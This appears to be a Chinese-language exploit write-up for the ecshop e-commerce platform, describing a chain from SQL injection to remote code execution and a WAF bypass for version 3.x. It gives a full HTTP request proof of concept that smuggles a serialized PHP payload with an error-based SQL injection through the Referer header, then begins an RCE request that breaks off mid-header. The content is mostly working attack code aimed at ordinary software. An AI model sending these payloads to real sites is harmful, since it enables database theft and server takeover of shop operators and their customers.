如何从SQLi到RCE – ecshope 2/3.x Getshell

分为两个个部分:

  1. ecshop 2.x getshell
  2. Bypass ecshop 3.x WAF

Exploit

ecshop 2.x

SQLi POC

1
2
3
4
5
6
7
8
9
10
11
GET /user.php?act=login HTTP/1.1
Host: test1.ecshop.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:68:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)";s:2:"id";i:1;}
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Upgrade-Insecure-Requests: 1

RCE POC

1
2
3
4
5
6
7
8
9
10
GET /user.php?act=login HTTP/1.1
Host: test1.ecshop.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzi